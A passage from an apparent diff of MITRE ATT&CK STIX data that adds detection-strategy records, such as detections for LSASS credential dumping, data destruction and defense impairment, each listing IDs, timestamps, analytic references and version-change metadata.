+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0876",
+                            "external_id": "DET0876"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--44001c2d-9832-4b2d-b3ac-a25cea93e03f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7f3e2c35-7394-4cc6-baef-73a830930953",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0885",
+                            "external_id": "DET0885"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Infrastructure",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--816aaddd-dc6d-49da-8ecd-8afde6278181"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--793c70fb-bc7a-4a77-95aa-7b0c583f10b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0363",
+                            "external_id": "DET0363"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Credential Dumping from LSASS Memory via Access and Dump Sequence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2b0dd3b6-6949-4dd5-b0dd-7b0b6f431dbe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d918611a-9d07-4f8b-b70e-2fe1c2f75faf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0139",
+                            "external_id": "DET0139"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Credential Harvesting via API Hooking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--89e3c3a3-249e-4af3-8885-92c228d88b02",
+                        "x-mitre-analytic--c031c27b-4d05-406a-8538-04ce1df41d35",
+                        "x-mitre-analytic--b8141218-1f71-4b65-a611-7c9c55038c4c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8b2a91cd-4a15-4b25-9b75-581298f3ef82",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0480",
+                            "external_id": "DET0480"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Credential Harvesting via Web Portal Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5233d621-6658-4338-b183-01bd73e52861",
+                        "x-mitre-analytic--4f33b538-1370-4df1-934f-fe3a609453fb",
+                        "x-mitre-analytic--564071d9-44b1-44b8-92c0-348e22e544b7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--500c6151-e3d6-4c3e-8d46-6e58df27f497",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0813",
+                            "external_id": "DET0813"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Credentials",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fed95f58-2b3a-46c5-a4b1-a3d378d036cb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3058b630-ede1-4bbb-b8ce-985d802e1e8d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0843",
+                            "external_id": "DET0843"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of DNS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e9808ca9-3019-4395-b2d8-717f5d4863fe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6a5e5149-9118-44e1-8933-0d2a8839df3a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0891",
+                            "external_id": "DET0891"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of DNS Server",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9eb9a81f-cf55-48f8-a8da-217a7684aff4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a1757dd9-9abb-4fd1-a06d-6cbfd80d77e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0862",
+                            "external_id": "DET0862"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of DNS Server",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4e469a08-db8b-49c1-8bf6-f76ffa21860f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e7b468e8-3b2c-43ea-aabb-e8ba993bd7ae",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0877",
+                            "external_id": "DET0877"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of DNS/Passive DNS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cf66582f-6fa3-4d3b-a322-95c2af08b49b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a5800f15-f024-4701-912a-20d7e1cb465a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0511",
+                            "external_id": "DET0511"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Access and Collection from Removable Media",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4385bff9-e730-48cd-bdfc-43de56c302aa",
+                        "x-mitre-analytic--5312ddd0-dd58-4bcb-afc0-7a05a6b2df42",
+                        "x-mitre-analytic--9abfb75c-2051-4549-b458-f09c4e6f4ad3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c54fdf95-c7ac-4ca4-bd99-273e56da20a5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0146",
+                            "external_id": "DET0146"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Destruction Across Platforms via Mass Overwrite and Deletion Patterns",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--791dfdd4-b04d-498a-accc-ee9e2acc7b14",
+                        "x-mitre-analytic--839d7053-fc62-433a-8eb2-ed87605160f7",
+                        "x-mitre-analytic--5e1b310a-ce3d-4271-83e0-87cd2862f959",
+                        "x-mitre-analytic--c6f35e44-459c-456b-97a7-997eb2baefb9",
+                        "x-mitre-analytic--9ea1e329-691a-43a7-b56d-affbc00fb9e7",
+                        "x-mitre-analytic--7735a0b1-f3bc-44fc-a909-75738e77bded"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ac4c58e-73de-4da1-8fc3-c2ccc511d884",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0123",
+                            "external_id": "DET0123"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Exfiltration via Removable Media",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--198d4196-25f0-4e28-a95b-c89709f452ab",
+                        "x-mitre-analytic--4e288214-93b3-48a7-b51e-2b0136db8540",
+                        "x-mitre-analytic--acaabb0b-6cfc-45cd-8bd9-08ad49e1096c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--11f7fa69-2da4-4280-90d2-abc2f0722683",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0014",
+                            "external_id": "DET0014"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Staging Prior to Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7cb2010a-e502-4117-94f3-fa3bd8d64a34",
+                        "x-mitre-analytic--e9ee76c8-e959-4925-8f93-4b8fb66bc9f1",
+                        "x-mitre-analytic--313de6ca-629b-4f77-b58f-5cf7b490a62e",
+                        "x-mitre-analytic--e622500c-4217-466c-955c-82ef3217653a",
+                        "x-mitre-analytic--e59e2d8c-20cb-4a77-9d8b-1d838b01bd87"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cff5ca37-cc4a-431c-b481-d0ccabbf6980",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0465",
+                            "external_id": "DET0465"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Default Account Abuse Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7a3dd710-39a7-4327-8d3b-150c50b2c680",
+                        "x-mitre-analytic--c804a181-f0be-41dd-81ce-95e0a3e5245d",
+                        "x-mitre-analytic--a8ed4e86-c79a-40db-84e5-1b4cf0e917d3",
+                        "x-mitre-analytic--96fe3582-b1a3-40e4-9e9d-bab764f2af7e",
+                        "x-mitre-analytic--305b6a70-6d5b-4b32-a40b-ae0cae342e62"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3a3820cd-260b-43d0-b5af-89b7ba81a044",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:13:38.727000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0900",
+                            "external_id": "DET0900"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Defense Impairment",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7ec436a3-dd31-4d23-a51b-0e03d3c474bd",
+                        "x-mitre-analytic--c6fb992c-387e-49ee-beaf-a1351aded262",
+                        "x-mitre-analytic--f46639b5-4d99-4d52-8da9-112a468cc6d8",
+                        "x-mitre-analytic--9df50fd3-bbad-43ce-b511-1bf995f1b583",
+                        "x-mitre-analytic--47df93f9-b33f-4333-95b6-b3cca9418a4d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-16 17:13:38.727000+00:00\", \"old_value\": \"2026-04-16T17:13:38.727Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:23:12.031Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a21019ad-f6d2-4806-be7b-01ba27c63147",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497",
+                            "external_id": "DET0497"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Defense Impairment through Disabled or Modified Tools across OS Platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7faf6f37-f074-4b9d-be19-618c3516486d",
+                        "x-mitre-analytic--bda03bab-3f0b-4bd0-8a8f-77bcb2b1ee7d",
+                        "x-mitre-analytic--9e9a5111-038b-4c68-a8bc-6d094723def4",
+                        "x-mitre-analytic--5d329e39-a38b-47cd-8d3d-fa7515280fd7",
+                        "x-mitre-analytic--f421cbe1-d42e-45e9-adad-12c6ed0a5cb8",
+                        "x-mitre-analytic--e542342f-5a08-408d-b292-797bcb2da5eb",
+                        "x-mitre-analytic--2b990a38-dedf-4a9a-9bd2-9a805c2f1b46"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:24:31.994Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
